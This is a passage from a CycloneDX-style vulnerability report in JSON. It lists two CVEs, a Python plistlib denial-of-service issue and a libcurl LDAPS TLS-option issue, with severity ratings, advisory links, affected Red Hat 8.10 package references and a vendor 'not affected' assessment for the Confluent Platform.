          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13837",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13837"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13837"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036"
        },
        {
          "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b"
        },
        {
          "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70"
        },
        {
          "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb"
        },
        {
          "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111"
        },
        {
          "url": "https://github.com/python/cpython/issues/119342"
        },
        {
          "url": "https://github.com/python/cpython/pull/119343"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-13837.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
        }
      ],
      "published": "2025-12-01T18:16:04+00:00",
      "updated": "2026-06-17T08:34:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14017",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14017"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14017"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:35:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
